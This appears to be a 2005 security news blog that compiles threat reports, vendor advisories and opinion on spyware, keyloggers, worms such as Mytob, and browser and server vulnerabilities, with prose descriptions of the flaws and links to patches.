As part of its delivery function, the P2Load.A attack modifies an infected computer's Hosts file so that when an unsuspecting user attempts to call up the search engine, they are instead diverted to the mocked-up version of the site, which Panda said was hosted somewhere in Germany. The fraudulent page appears as an exact copy of Google and supports all 17 languages that the search site is offered in. The virus has also been designed to redirect people who mistype Google's URL into their browsers, and will pop up if someone mistakenly types wwwgoogle.com, www.gogle.com, or www.googel.com.
-- Symantec observed that denial-of-service attacks grew from an average of 119 per day to 927 per day during the first half of 2005 -- a 680% increase over the previous reporting period. The most frequently targeted industry was education, followed by small business and financial services.
-- The time between the disclosure of a vulnerability and the release of associated exploit code decreased from 6.4 days to 6.0 days. In addition, an average of 54 days elapsed between the appearance of a vulnerability and the release of an associated patch by the affected vendor. This means that, on average, 48 days elapsed between the release of an exploit and the release of an associated patch; during this time, systems are either vulnerable or administrators are forced to create their own workarounds to protect against exploitation.
-- During the first half of 2005, Symantec documented 1,862 new vulnerabilities -- the highest number ever recorded in the Internet Security Threat Report. 97% of these vulnerabilities were classified as moderate or high in severity, and 59% of all vulnerabilities were found in Web application technologies, marking an increase of 59% over the previous reporting period and a 109% increase over the first six months of 2004.
-- A growing number of Win32 viruses and worm variants were also reported during the first half of 2005. Symantec documented 10,866 new Win32 virus and worm variants, an increase of 48% over the previous reporting period and 142% over the first half of 2004.
-- Adware, spyware, and spam continue to propogate, according to the report. Eight of the top 10 adware programs were installed through Web browsers. Of the top 10 adware programs reported, five hijacked browsers. Six of the top 10 spyware programs were bundled with other programs and six were installed through Web browsers. Symantec also observed that spam made up 61% of all e-mail traffic and that 51% of all spam received worldwide originated in the United States.
-- An analysis of future and emerging trends concluded that an increase in the number of attacks and threats directed at wireless networks is likely. In addition, Voice over Internet protocol (VoIP) threats are expected to emerge as more enterprises merge their data and voice networks. "Full Article"
Mac users are "operating under a false sense of security," according to Symantec Corp., and Firefox users will have to recognize that the popular open-source Web browser is currently a greater security risk than Microsoft Corp.'s Internet Explorer.
Symantec's latest Internet Security Threat Report, published today, found evidence that attackers are beginning to organize for attacks on the Mac operating system. Researchers also found that over the past six months, nearly twice as many vulnerabilities surfaced in Mozilla browsers as in Explorer.
"It is now clear that the Mac OS is increasingly becoming a target for the malicious activity, contrary to popular belief that the Mac OS is immune to traditional security concerns," the report said. "Full Article"

Thursday, September 08, 2005
Microsoft Corp. has alerted users to a problem in Windows Firewall that could be exploited by attackers as part of a broader system infection. The problem means that Windows Firewall can be made to hide certain information from the user, Microsoft said.
The bug isn't itself a vulnerability, Microsoft said in an advisory last week, since it can't be used to invade a system. It is, rather, an "unexpected behavior" that an attacker could use to cover up malicious activity, Microsoft said.
The company issued a patch for the problem, available only to authenticated Windows users.
The flaw is in the way Windows Firewall displays exception entries, which are created by administrators to allow incoming network connections. If an exception is created in the registry, it won't be displayed in the Windows Firewall user interface, meaning users might not be able to spot the exception entry.
It's unlikely that such a registry entry would be created under ordinary circumstances, and a user couldn't create one without administrator privileges, Microsoft said.
"It is more likely that an attacker who has already compromised the system would create such malformed registry entries with intent to confuse a user," Microsoft said in the advisory.

Wednesday, September 07, 2005
Below was sent via email claiming to be from google: Please do not click on the link included in the bottom of the email. It takes you to a site called "Dan-Trade.US" Do not go to this site! The purpose of this article is to warn people not to visit this site. As long as they are inserting things in peoples machines.
This site "Dan-Trade.US" is trying to insert mal-ware in your machine. The site should be shut down till it is cleaned up if they are not purposefully inserting. If they are the police should shut it down. If they get it cleaned up we will be happy to post a site clean up notice.
New Orleans police urging people away
New Orleans Deputy Police Chief Warren Riley, in the department's first news conference since the storm,
said one of the greatest current challenges is persuading thousands of remaining people to leave their homes in a city without any municipal services and no prospect of any for months.
"What our officers are telling people is that there is absolutely no reason to stay here," he said. "There are no jobs.
There are no homes to go to, no hotels to go to. There is absolutely nothing here. We advise that the city has been destroyed."
As many as 10,000 people were thought to have been left behind — or chosen to stay.

Thursday, August 25, 2005

When you install anything be sure you know it is clean. Please don't put this garbage in your machine in the first place. Love the quote at Block-Checker.com proud to be spyware free, sure. Yet the only way we learned of the product was through McAfee this is clearly a good sign.
Virus Characteristics
This Trojan lowers internet security settings, adds itself to firewall exclusion policies and downloads multiple adwares.
It adds itself to Add Remove Program with the names "Block-checker 1.0" and "System Process". If the user tries to uninstall "System Process", this Trojan attempts to download various adwares on the system. This is related to Block-Checker.com.
Upon installation the program it displays EULA. The privacy policy is located at
http://www.system-processes.com/liscense.php
It is observed to contact the following sites apart from various other
adware sites that it downloads.
See McAfee for details

Wednesday, August 24, 2005

Court approves AhnLab's spyware classification
The Southern District Court of Seoul ruled this week that AhnLab's detection and labelling as spyware of the product of software company Digital Names is justified.
The court rejected a petition filed by Digital Names to stop the distribution of AnhLab's anti-spyware product SpyZero, ruling that the spyware label was appropriate since the program in question reinstalls itself automatically even after deletion.
Bravo at least a court somewhere has the nerve to take on these parasites.

Tuesday, August 23, 2005
US-Cert has published a report on spyware, http://www.us-cert.gov/reading_room/spyware.pdf, a 15-page document that includes an overview, definition and examples of different types of threats. Some of the recommended defensive measures include the following:
- Don't trust unknown or known high-risk sources.
- Read the fine print.
- Pay attention when installing applications.
- Keep operating systems and software patched.
- If you are running Windows XP, install Service Pack 2.
- Use trusted anti-virus and anti-spyware tools.
- Alternative internet applications.
- Browser configuration.
Computer Associates announced a 6.9 million dollar contract to protect Department of Defense (DOD) computers from spyware. The need for the contract indicates spyware has infected military computers. An article from FCW.com about antispyware software at Fort Hood just read the quote from Army Maj. Bert Belisch:
Unlike with viruses, no one has offered the public a complete catalog of spyware threats. And until that happens, we're left with a lot of hype and fear instead of facts and solutions. In short, despite all the antispyware apps being produced these days, we're no closer to eradicating the spyware problem.
Antispyware vendors typically use three types of databases. Some use a community database which is drawn from subscribers who report suspected spyware. It was reported by Cnet that Microsoft uses Skynet for its spyware collection. Webroot (makers of SpySweeper) primarily use its Phileas Technology to crawl all over the Internet and find new examples of spyware. Finally, there are hybrid databases, combining the above two methods.
With the total failure of The Consortium of Anti-Spyware Technology vendors (COAST) which were a group founded by PestPatrol (now part of Computer Associates), Webroot (makers of SpySweeper), and Aluria (makers of Spyware Eliminator), but the group ceased to exist a few months ago after vicious in-fighting regarding the very definition of spyware. What then is the interest of any one to even define what it even is. As long as it is all driven by money there is no serious solution. The rambling will simply continue and every consumer will suffer.
Opinion: Nobody who takes security seriously could get hit through Windows 2000 PnP vulnerability, yet lots of large corporations were hit. You do the math.
Quotes From Larry Seltzer
August 16, 2005
After reading both of Larry Seltzers posts on the 16th over a patch MS05-039 that MS released on August 9th. It really is amazing that while this seemed to be straight forward worm easy enough to prevent it was over the network news channels as if it were terminal.
Everything he said in his column about mitigating factors on this vulnerability holds: "the stupidest firewall in the world would block this worm from spreading and only Windows 2000 systems are vulnerable". I also liked the possible cause.
"So it makes sense that it's Fortune 500 corporations that are being attacked, since they are the heartland for Windows 2000 usage. Of course, all these companies have firewalls at their perimeters, so the attack had to come from the inside. It's a cliche in the security business by now, but someone took their unpatched, unfirewalled Windows 2000 system out into the real world and got it infected with this worm. Then they took it back to the office, plugged it in and logged on, and soon everyone else on the network segment was hit hard." As he stated it is 'NOT' the only a possible cause though likely.
New Worms Catch Big Business With Pants Down
August Patch Winds Fade

Monday, August 22, 2005

CVE Reference : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-08-21
* Technical Description *
Multiple vulnerabilities were identified in various Computer Associates products, which may be exploited by remote or local attackers to execute arbitrary commands or cause a denial of service.
The first issue is due to an unspecified error in the CAM messaging sub-component, which could be exploited by remote attackers to cause a denial of service.
The second flaw is due to a buffer overflow error in the CA Message Queuing Server that does not properly handle specially crafted requests, which could be exploited by remote attackers to execute arbitrary commands with SYSTEM privileges.
The third vulnerability is due to an unspecified error in the CAFT application that does not properly handle specially crafted messages, which could be exploited by attackers to execute arbitrary commands.
(platforms : AIX, DG Intel, DG Motorola, DYNIX, OSF1, HP-UX, IRIX, Linux Intel, Linux s/390, Solaris Intel, Solaris Sparc, UnixWare, Windows, Apple Mac, AS/400, MVS, NetWare, OS/2 and OpenVMS).
* Solution *
Fixes for CAM v1.11 prior to Build 29_13 :
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam111fixes.asp
Fixes for CAM v1.07 prior to Build 220_13 :
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam107fixes.asp
Fixes for CAM v1.05 (any version) :
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam107fixes.asp
* References *
http://www.frsirt.com/english/advisories/2005/1482
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp

Saturday, August 20, 2005

Original release date: 8/19/2005
Source: US-CERT/NIST
Incomplete blacklist vulnerability in the checkBlacklist function in CPAINT allows remote attackers to execute arbitrary commands via the (1) ExecuteGlobal function or (2) GetRef statement, which is not included in the blacklist.
Severity: High
Range: Remotely exploitable
Impact Type: Provides user account access
External Source: BUGTRAQ (disclaimer)
Name: 20050816 RE: Vulnerability found in CPAINT Ajax Toolkit
Type: Advisory
Hyperlink: http://marc.theaimsgroup.com/?l=bugtraq&m=112421484419768&w=2
CPAINT, CPAINT
Vulnerability Type: Input Validation Error
CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2625
| Critical: |
Highly critical |
| Impact: |
System access |
| Where: |
From remote |
| Solution Status: |
Vendor Patch |
| |
| Software: |
Adobe Acrobat 5.x Adobe Acrobat 6.x Adobe Acrobat 7.x Adobe Acrobat Reader 5.x Adobe Reader 6.x Adobe Reader 7.x |
| |
Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it. |
| |
| CVE reference: |
CAN-2005-2470 |
| |
Description: A vulnerability has been reported in Adobe Reader and Adobe Acrobat, which potentially can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an unspecified boundary error in the core application plug-in and can be exploited to cause a buffer overflow when a specially crafted file is opened.
Successful exploitation may allow execution of arbitrary code.
Solution: Install updated version.
Adobe Reader (Windows or Mac OS): Update to version 7.0.3 or 6.0.4.
Adobe Reader (Linux or Solaris): Update to version 7.0.1.
Adobe Acrobat (Windows or Mac OS): Update to version 7.0.3, 6.0.4, or 5.0.10.
Provided and/or discovered by: Reported by vendor.
Original Advisory: Adobe: http://www.adobe.com/support/techdocs/321644.html
Other References: US-CERT VU#896220: http://www.kb.cert.org/vuls/id/896220 |

| Critical: |
Highly critical |
| Impact: |
System access |
| Where: |
From remote |
| Solution Status: |
Vendor Workaround |
| |
| Software: |
Microsoft Internet Explorer 5.01 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 6.x |
| |
Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it. |
| |
| CVE reference: |
CAN-2005-2127 |
| |
Description: A vulnerability has been reported in Internet Explorer, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an error when the "msdds.dll" (Microsoft DDS Library Shape Control) COM object is instantiated in the Internet Explorer browser.
Successful exploitation allows execution of arbitrary code, but requires that a user is tricked into visiting a malicious web site.
The COM object is reportedly installed as part of the following products: * Microsoft Visual Studio .NET 2002 * Microsoft Visual Studio .NET 2003 * Microsoft Office Professional 2003 * Microsoft Office XP
Other products may also include the affected COM object.
NOTE: An exploit has been published. However, there are currently conflicting reports about the exploitability of this issue. Some reports confirm that code execution is possible, while other reports indicate that the problem can't be reproduced. This indicates that only certain versions of the COM object may be affected. Secunia has currently not been able to reproduce the vulnerability in version 7.10.3077.0 of the COM object (included with Microsoft Office 2003 and Microsoft Visual Studio .NET 2003).
Solution: Restrict use of ActiveX controls to trusted web sites only. The vendor has various other workarounds documented in the original advisory. A non vendor solution Killbit Work around here.
Other News by: Eweek article:
Changelog: 2005-08-18: Added Microsoft Office XP as affected. Added link to ISC. 2005-08-19: Added additional information from Microsoft.
Original Advisory: Microsoft (KB906267): http://www.microsoft.com/technet/security/advisory/906267.mspx http://support.microsoft.com/kb/906267
Other References: ISC: http://isc.sans.org/diary.php?date=2005-08-18
US-CERT VU#740372: http://www.kb.cert.org/vuls/id/740372 |

Thursday, August 18, 2005
Keyloggers are one of the most dangerous spyware parasites.
Activity of these usually small malicious programs is really catastrophic. Although keyloggers do not destroy the operating system or installed software and don't corrupt files, they steal the most valuable user information, including all the passwords, login names, everything written in priceless documents, every letter in a chat conversation or e-mail message.
A typical keylogger not only records all keystrokes, but also captures screenshots of user activity, logs software usage, exact addresses of visited web sites, even mouse clicks and time when the user turns off his computer and sends all quietly sends gathered data to a predefined e-mail address. What can be worse? Keyloggers allow the attacker to be well informed about all your secrets, current works, contacts, interests, your entire life. However, you can prevent such an intervention. In most cases keystroke capture can be revealed and avoided. In this article I will give you several advices that you should always keep in mind.
Spying techniques
Depending upon the nature of the information gathered, each piece of spyware may function differently. Some spyware applications simply gather information about a user's surfing habits, purely for marketing purposes, while others are far more malicious. In any case, the spyware attempts to uniquely identify the information sent across a network by using a unique identifier, such as a cookie on the user's hard disk or a Globally Unique Identifier (GUID). [ref 2] The spyware then sends the logs directly to a remote user or a sever that is collecting this information. The collected information typically includes the infected user's hostname, IP address, and GUID, along with various login names, passwords and other keystrokes. " Full article "
The National Institute of Standards and Technology (NIST) has unveiled its mega-database, otherwise known as the National Vulnerability Database. The NVD will issue daily updates of viruses that are wrecking havoc on popular software products and post notices on security trends.
The database was created as a means to warn users about security threats both big and small, according to a report in SecurityFocus.
NVD is a comprehensive cyber security vulnerability database that integrates all publicly available U.S. Government vulnerability resources and provides references to industry resources. It is based on and synchronized with the CVE vulnerability naming standard.

Saturday, August 06, 2005

Officials at Sunbelt Software, a Clearwater, Fla.-based vendor of antispyware tools, said the company stumbled upon a massive ID theft ring that is using a well-known spyware program to break into and systematically steal confidential information from an unknown number of computers worldwide.
The operation was discovered yesterday during research Sunbelt was doing on a spyware program belonging to a particularly dangerous class of browser hijacking tools called CoolWebSearch (CWS), according to Sunbelt's president, Alex Eckelberry.
CWS programs are extremely hard to detect and remove, and are used to redirect users to Web sites that use spyware tools to collect a variety of information from infected computers.
The CWS variant being researched by Sunbelt turned infected systems into spam zombies and uploaded a wide variety of personal information to a remote server apparently located in the U.S. That server holds a "treasure trove of information" for ID thieves, Eckelberry said.
Sunbelt's research showed that the information being uploaded to the remote server included chat sessions, user names, passwords and bank information, he said. The bank information included details on one company bank account with more than $350,000 in deposits and another belonging to a small California company with over $11,000 in readily accessible cash, he said.
Full Article here | Removing and detecting

Tuesday, July 19, 2005
While Distribution is not high, Damage Level is Extremely High.

We have written many articles on the subject of key loggers. We view these as one of the highest possible threats as hackers are looking over your shoulder so to speak. You typically have to go through alot to remove or detect them. Unlike a virus these keyloggers make your machine one of the most dangerous places to store your confidental information.
We as computer users find every country in the world seems unwilling to react to the threat these little applications pose. The facts are you could be being watched right now without your knowledge. People think the internet is safe. However, opening attachments and browsing the web at a cyber cafe, or WIFI network, or even doing a web search, may make you the target of the type of people who look at you as nothing more than a mark.
We want to warn that just doing a search of keyloggers on the web can start the process of stealing your identity. This is a very spooky thing indeed. Personally one would think that any web site that would be allowed to inject such a thing in your computer without your knowledge should be shut down and all the people rounded up and taken off to prison.
We should all demand that any web site indexed by all search engines which does any type of popup request be dropped at once from the search engines index list. This action would not allow indexing of this domain again for 90 days. Yes this would be rude we admit. Over night we would cut the internet risks. After all the majority of proper business people do not or should not be using popups and people of course should have their machines configured so that these things do not insert without your knowledge. Honestly though it is a case where people who are ignorant of these things are the prime targets.
We also know from a technical stand point requesting that a search engine like Google, Yahoo, or MSN to do this with their spiders is asking alot. Let me say it a different way then. If you do it you will have the winning search engine on the web. Money is the driving force for the web having the safest search sounds like a winner. Any search engine which says it is technically too difficult would not be used and will die on the vine. "Safe Searching" what a concept. No Police Force seems to have a clue. So what about the white hats are you all just overwhelmed with defense?
The internet was designed and built by basically honest people. It is type of mindset that seems to have given criminals a place to pray on others. If something is not done honestly the numbers of people who ran to the web and its technology will simply leave. After all there was life before the web. Not changing will simply make people avoid it again saying we are not smarter than the bad guys. We are sure everyone could just blame Microsoft for all the worlds problems and move away. However this is a bigger issue than that.
Removal Instuctions for this
Extremely High Distribution

| Yet another of the family of Mytob worms. Removal tool gives a list of these viruses which it will remove.
We have given this a Very high threat level since are seeing large numbers of these trying to transit our mail servers. |
 |
W32.Mytob@mm is a mass-mailing worm that opens a back door and lowers security settings on the compromised computer.
| Also Known As: |
Net-Worm.Win32.Mytob.bi [Kaspersky Lab], W32/Mytob.gen@MM [McAfee], WORM_MYTOB.FH [Trend Micro] |
|
|
| Type: |
Worm |
| Infection Length: |
45,320 bytes. |
|
|
| Systems Affected: |
Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP | |

Friday, July 08, 2005

A highly critical vulnerability has been found in XML-Remote Procedure Call (define), which impacts many open source applications that use the vital software component. The flaw could allow an attacker to take control of a vulnerable Web server.
Open source projects and Linux vendors alike have issued advisories and updates and the SANS Internet Storm Center has warned that the flaw could trigger an epidemic.
XML-RPC is set of implementations based on a specification originally drafted by Dave Winer, who's credited with creating RSS (define). XML-RPC is a cross-platform spec that allows for software to make procedure calls using XML for encoding and HTTP for transport.
The vulnerability has been found in PHP (define) implementations of XML-RPC from both the PHPXMLRPC and PEAR (The PHP Extension and Application Repository download sites, which are included in "dozens" of applications written in PHP, according to the advisory.
The XML-RPC implementations are at a "very high risk" from the PHP code execution vulnerability according to security firm GulfTech Research, which reported the flaw late last week.
GulfTech Research said "the vulnerability is the result of unsanatized data being passed directly into an eval() call in the parseRequest() function of the XMLRPC server."
GulfTech's advisory goes on to note that can attacker could easily execute exploit PHP code on the target server by creating an XML file that includes single quotes in order to escape into the eval() call.
PEAR and PHPXMLRPC have issued updates to fix the issue. Various blog, Wikis and Content Management Systems (CMS) that utilize the XML-RPC libraries have issued advisories to their users to update as well. Among the many affected programs are Serendipity, phpAdsNew, phpWiki, PostNuke, WordPress, Drupal, phpMyFAQ, b2evolution, TikiWiki. phpGroupWare and BLOG:CMS.
Among Linux vendors, Gentoo and Mandriva issued advisories on the issue.
Over the weekend, the SANS Internet Storm Center warned that the XML-RPC flaw combined with the unpatched Microsoft IE flaw could lead to an Internet "storm".
Microsoft has provided advance notice that three "critical" security bulletins will be released in this month's patch batch.
The bulletins will include patches for flaws in Microsoft Corp.'s flagship Windows operating system and the Microsoft Office desktop productivity suite.
As is customary, the software giant isn't providing any details until July 12, when the bulletins are posted.
The three updates represent a relatively small batch of patches, coming on the heels of last month's barrage when Microsoft shipped 10 bulletins, including a "critical" update for the Internet Explorer browser.
This time around, security researchers are expecting another cumulative IE patch to address a known code execution flaw in the widely deployed browser.
Over the last week, Microsoft has been providing pre-patch workarounds and mitigation guidance alongside warnings that potentially destructive exploit code has been posted on the Internet.
Microsoft typically includes IE patches under the Windows umbrella in its Security Bulletin Advance Notice mechanism. However, because IE patches require extensive testing, there have been long delays in the past to get a cumulative browser update out the door.
"When they're motivated to fix things quickly, they can," he added.
eEye maintains a list of unpatched security vulnerabilities and the time that has elapsed since the bug was first reported to the company. According to Maiffret, there are four Microsoft flaws that have not been addressed, including one that is 40 days overdue.
Microsoft is also expected to release an updated version of its malicious software removal tool to add detection for new worms, Trojans and virus variants.
The company will also push out a non-security, high-priority update for Microsoft Office.

Thursday, July 07, 2005

A study released yesterday found that hackers and virus writers are recognizing and exploiting the opportunities presented by IM-based attacks, the numbers of which have risen sharply over the last two quarters.
The number of IM attacks such as viruses, worms, and phishing scams has increased from twenty for all of 2004 to 571 in the second quarter of 2005 alone, representing an increased threat to both enterprise users and the average consumer, the study from instant messaging security vendor IMlogic Inc. said.
The study, performed by the IMlogic Threat Center with the support of IT security companies Symantec Corp., McAfee Inc., and Sybari as well as IM leaders America Online Inc., Yahoo Inc., and Microsoft Corp., reported that 70% of IM-based attacks target public IM networks and 30% target enterprises.
"IM usage has reached critical mass and virus writers have now recognized it as a mostly undefended medium," said IMlogic CEO and co-founder Francis deSouza. "These [viruses and worms] are mutating, high velocity, and invisible to most companies until they hit. All these factors combine to create a serious risk."
IM attacks act much like e-mail worms and viruses, stealing information from the user's computer or turning that computer into a so-called zombie by tricking users into clicking on phony links or into opening malicious attachments. IM-based attacks can be even more threatening because people receive false instant messages from a name on their buddy list rather than a strange e-mail address, DeSouza said.
"Having an army of zombies is the economic equivalent of having an oil well," said analyst Alan Paller of the SANS Institute. "The two most important things [for a user] to do are block all attachments on IM and to filter IM traffic so you only get it from trusted sites."
In corporate environments the Kelvir, Opanki and Gabby worms were the most common, the study said.
Some attacks are tailored to a specific user and appear to be, for instance, a highly personalized message. The study said that these attacks made up less than 1% of the recorded IM attacks. For the most part, IM attackers aren't sophisticated enough to single out any one user, Paller said. However rare "targeted" attacks may be, Paller emphasized that they are the most dangerous.
The vast majority -- 86% -- of reported attacks involved viruses or worms that capitalize on real-time protocols. The study showed that all of the most successful IM services -- AOL Instant Messenger, MSN Messenger, Windows Messenger, and Yahoo Messenger -- were vulnerable to IM attacks.
We certainly also recommend that you have either. Nod32 Anti-virus and the free anti-virus from AVG and AVast some of these offer protection for IM and Outlook as real-time plug-in.

We are listing this threat as high to assure that people do not just ignore the level. Don't let themself fall pray to it.
Microsoft Corp. has released software that can be used to mitigate a critical vulnerability in Internet Explorer that was first reported last week.
The bug, which concerns the way Internet Explorer handles ActiveX components, can cause the browser to crash and could be used by an attacker to run unauthorized software on the user's machine, Microsoft said.
Yesterday, Microsoft released software that in the registry disables a file called Javaprxy.dll, which is used to run these components in Internet Explorer. This file is used by the Microsoft Java Virtual Machine, the company said.
Microsoft has not yet decided whether it will release a software patch that would fix the underlying problem, a spokeswoman said. "The work-around that they've offered here doesn't fix the underlying vulnerability, but it removes the functionality," she said.
Danish security company Secunia gave the vulnerability its most serious rating, calling it "extremely critical."
The Austrian security researchers who discovered the flaw expect Microsoft eventually to issue a full-blown patch.
"Right now, it's not that dangerous," said Martin Eisner, chief technical officer at security consulting company SEC Consult Unternehmensberatung GmbH. "But of course within a couple of weeks there will be somebody who has a little bit more time than we have and there will be an exploit then," he said in an interview last week.
Microsoft is unaware of any software that has exploited the bug, the spokeswoman said.
Microsoft has issued a security advisory that provides more details on the bug and lists other possible work-arounds to the problem.

Friday, July 01, 2005

Another new wave of spam that disguises itself as a Microsoft Corp. security bulletin contains a link to malicious software that gives attackers complete access to the infected machine, security researchers are reporting.
The e-mail, which began circulating late Tuesday, identifies itself as Microsoft Security Bulletin MS05-039, and offers a link to what it claims is a patch against the Sober Zafi and Mytob worms.
In fact, there is no such thing as Microsoft Security Bulletin MS05-039, and real Microsoft security bulletins offer links to a Microsoft download site, rather than to the patches themselves, said Mikko Hypponen, director of antivirus research at F-Secure Corp.
The phony patch is a variant of the SDBot Trojan software, which is at present not detected by antivirus software products, according to a report from security research firm WebSense Inc.
The risk of someone downloading this Trojan appears to be very low right now, because the server hosting the Trojan downloads no longer appears to be active.

Microsoft late Thursday confirmed a security flaw in its dominant Internet Explorer browser could be potentially exploited by malicious hackers to take "take complete control of the affected system."
The software giant released a security advisory acknowledging the vulnerability and recommended that IE users set Internet and local intranet security zone settings to "High" before running ActiveX controls in these zones.
All supported versions of Internet Explorer, including IE 6.0 in Windows XP SP 2 (Service Pack 2) are affected.
Microsoft Corp.'s confirmation comes less than 24 hours after private security research firm SEC Consult published a working exploit to show that the bug could crash the browser or exploited to execute arbitrary code in the context of IE.
Microsoft said it was not aware of any attacks attempting to use the reported vulnerability or customer impact and promised a patch would be made available once an investigation is completed.
"A COM object, javaprxy.dll, when instantiated in Internet Explorer can cause Internet Explorer to unexpectedly exit. We are investigating a potentially exploitable condition," Microsoft said in the advisory.
The company said a successful attacker could exploit the flaw by creating a malicious Web page and persuading the user to visit the page.
"An attacker could also attempt to compromise a Web site to have it display a Web page with malicious content to try to exploit this vulnerability."
Microsoft accused SEC Consult of publishing details and proof-of-concept that put customers at risk. However, the research outfit said it only posted the details after Microsoft said it could not confirm the existence of the flaw.
"Microsoft [did] not confirm the vulnerability, as their product team can not reproduce condition," SEC Consult said in an advisory. After the publication of SEC Consult's advisory, Microsoft later reproduced the issue and posted its advisory.
More information on suggestion actions is available in Microsoft's security advisory.

Sunday, June 26, 2005
Consumers are totally confused as to when to take an action against something their anti-spyware has defined as a threat. Even the companies who write the code cannot agree on anything.
It is hard to get all these things to work together and behave. The burden is on the software provider who took on the task to enter this business. What is required here is some agreement on some basic standards for the business which will allow these applications to come up with a relevant guess. They're beset by legal headaches, constantly challenged for what their products define and target as malware.
Many anti-spyware programs scour computer hard drives for those data-tracking files called cookies that we often get from Web visits. Microsoft Corp.'s tool does not. And there are disputes aplenty about whether certain widely used advertising programs circulating on the Internet are clean of spyware.
Surprise! There's little agreement on what should be considered spyware, or even what adware is, exactly. Or on whether adware, which delivers ads, is a form of spyware or a breed apart. Honestly one should question any right they have to collect this demographic information as a matter of law. One would think that the right to privacy should win out. Again this has proven that money wins as a course of law. At least until the consumer numbers force the issue.
Claria Corp., formerly known as Gator Corp., has sued several anti-spyware companies and Web sites for calling its advertising software "spyware." PC Pitstop rewrote some of its materials as part of a settlement.
Joseph Telafici, director of operations for McAfee Inc.'s security research unit, says the company now gets one or two complaints a week, compared with two or three per quarter last year from companies whose programs it has dubbed spyware or adware.
Symantec Corp. sought to pre-empt a lawsuit by filing one itself, asking a federal court to declare that it had the right to call Hotbot.com Inc.'s toolbar adware. Hotbot did not respond to requests for comment.
Symantec still faces a lawsuit by Trekeight LLC, whose product Symantec brands adware.
Adding to the confusion is the fact that many legitimate programs — including Microsoft Corp.'s Windows operating system and Web browser — send out data without making the user fully aware, one of the common attributes of spyware.
And many programs that spy, do have legitimate functions — people may run a keystroke recorder to monitor spouses whom they suspect of cheating. Or they may willingly accept adware in exchange for a free game or screensaver.
Anti-spyware software companies say they leave removal decisions to customers, though many users simply follow their recommendations, failing to distinguish the mild from the malicious.
Anti-spyware companies have an incentive to overlist programs.
The fact that getting this issue resolved by some ruling, law, or guideline will only push the adware and spyware companies to refine what they do by some new term. Then they will stand up in court and dare you to call them a spyware company; then claiming they are "reportware"; "searchware" or "sponsorware."

Saturday, June 25, 2005
REDMOND, Wash.--The random chatter of several hundred Microsoft engineers filled the cavernous executive briefing center recently at the company's sprawling campus outside Seattle.
Within minutes after their meeting was convened, however, the hall became hushed. Hackers had successfully lured a Windows laptop onto a malicious wireless network.
"It was just silent," said Stephen Toulouse, a program manager in Microsoft's security unit. "You couldn't hear anybody breathe."
Matt Thomlinson, whose job it is to help make Microsoft engineers create more secure code, noticed that some of the engineers were turning red, becoming obviously angry at the demo hacking incident. Yet as painful as the lesson was, he was glad to see the crowd of engineers taking things personally.
Thomlinson frequently makes similar entreaties to the engineers on the need for secure code, but he said his own lectures don't have the same effect. "It kind of hits people up here," Thomlinson said, pointing to his head. "Things are different when a group of programmers watches their actual code exploited. It kind of hits people in the gut."
Full Article

Thursday, June 23, 2005

LONDON-- A new browser flaw could allow attackers to trick users into relinquishing sensitive information such as passwords. The flaw is unusual in that it affects every mainstream browser and can be exploited on the Mac OS X operating system as easily as on Windows, according to security company Secunia.
Because of the way most browsers handle JavaScript dialog boxes, it's unclear which site a dialog box originates from, Secunia reported. An untrusted site could direct a user to a secure site such as a bank, and then cause a dialog box to pop up in front of the bank site's window.
When the user entered password information, that data would be sent to the attacker, Secunia stated. "Successful exploitation normally requires that a user is tricked into opening a link from a malicious Web site to a trusted Web site," the company observed in its advisory.
Opera Patched
The flaw has been confirmed in Opera, Safari, Mozilla-based browsers, iCab, and Mac and Windows versions of Internet Explorer. As of Wednesday, only Opera had issued a patch, in version 8.01. The bug has been fixed in the beta of iCab version 3.0.
| The Redmond software vendor also has pushed out its beta-expiration date for its pending product from July to December. What's going on? |
 |
| Microsoft is slated to release to the Web in the next day or two a beta refresh of its Microsoft AntiSpyware product.
Some testers reported on Wednesday that they had downloaded a new beta version of Microsoft AntiSpyware (version number 1.0.613). They also reported that Microsoft had extended the beta-expiration date for the product from July 31, 2005, to December 31, 2005. |
Microsoft officials confirmed that Microsoft had extended the beta period until the end of the year. Officials also acknowledged that the company has been testing on a selective basis the beta refresh number 1.0.613. (The current beta version number is 1.0.509.)
The pending refresh is not Beta 2, however, Microsoft executives said. Beta 2 will be released "some time later this year," they said.
"We are going through with a refresh of the (Microsoft AntiSpyware) beta," said Paul Bryan, director of product management with Microsoft's security technology and business unit. "We are testing this right now a bit, making sure that things are OK" before releasing to all testers.
Microsoft officially announced its plans to field a Microsoft-branded anti-spyware product (code-named "Atlanta") in January, following its purchase of Giant Software in December, 2004. The beta supports Windows 2000, Windows XP and Windows Server 2003.
Microsoft released a publicly available Beta 1, that was not much more than a repackaging of Giant's technology, on January 6. On February 16, Microsoft issued a beta refresh. Since then, the company has made available weekly "signature updates" of the product to interested testers.
This week's Microsoft AntiSpyware beta refresh will include a couple of new features, Bryan said.
The refresh is designed to alleviate "some issues" with Winsock/ISP removal. While Bryan said these were relatively low in number in the current beta, he admitted that they've played havoc with some testers' network connectivity when certain traffic-intercepting software is part of a network stack
An ominous increase in sniffing activity on TCP Port 445 could signal an impending mass malicious code attack targeting a recently patched Microsoft vulnerability, according to a warning from security researchers.
Researchers at Symantec Corp.'s DeepSight Network have detected a surge in scans on Port 445, an indication that malicious hackers may have already created exploits for a flaw in Microsoft Corp.'s implementation of the SMB (Server Message Block) protocol.
In Windows 2000, Windows XP and Windows Server 2003, Microsoft uses TCP Port 445 to run SMB directly over TCP/IP to handle the sharing of files, printers, serial ports, and also to communicate between computers.
The vulnerability, which was rated "critical," was patched one week ago in Microsoft's MS05-027 bulletin, and the increased noise on that port could be the first sign that a password brute force attack is imminent, Symantec DeepSight warned.
A spokesperson for Microsoft's Security Response Center said the company was not aware of any active attempts to exploit the vulnerability.
